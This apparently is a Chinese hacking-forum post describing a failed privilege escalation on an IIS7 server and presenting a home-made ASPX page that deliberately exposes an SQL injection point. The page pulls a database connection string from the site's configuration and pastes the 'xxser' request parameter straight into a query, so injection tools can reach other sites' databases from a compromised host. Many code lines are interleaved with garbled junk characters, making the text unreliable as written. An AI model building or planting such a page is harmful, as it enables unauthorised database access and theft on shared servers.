利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
7 d; E0 d; A8 A# p
( z6 S. u4 r8 p9 N4 v# K* \3 D8 O​
5 K5 _  E' Y4 [* ~7 N$ Z2 S<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
* g: w' [$ h7 ^<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
0 w# ^5 e# w6 m9 \</head>
- G5 l: L: \8 @- I1 ]8 T<body>
/ M; R9 A- ]( \$ \& l4 L    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
            
& Z& A  e+ v: n' L         void page_init(object sender, EventArgs e)
. @; p! G9 t2 \& i/ q2 e# T( P         {
            
! K- k5 F$ f6 U3 T1 }, w             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
( b  Z4 D- O3 U' X7 x            
9 ^7 t. F6 s2 F* |( F9 @             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
7 ~! I8 q! M  l, C. s            
; v4 |1 M, F3 |             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
2 V# U+ c$ a: Y2 |. A            
: z  j; O) N* ?$ N. a             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
6 T/ [) d5 I5 {# v3 Q( Y5 w             Response.Write(x);
- m4 j* Q# W- x/ E6 f             conn.Close();
         }
4 Z  S. r3 }1 z     
. w- q" @& a; j: g* A+ O. S2 h/ E  </script>
    </div>
    </form>
</body>
+ J9 t6 N9 f# J5 o; a( \9 q</html>
: }6 Y; A* w* k6 f: N6 ^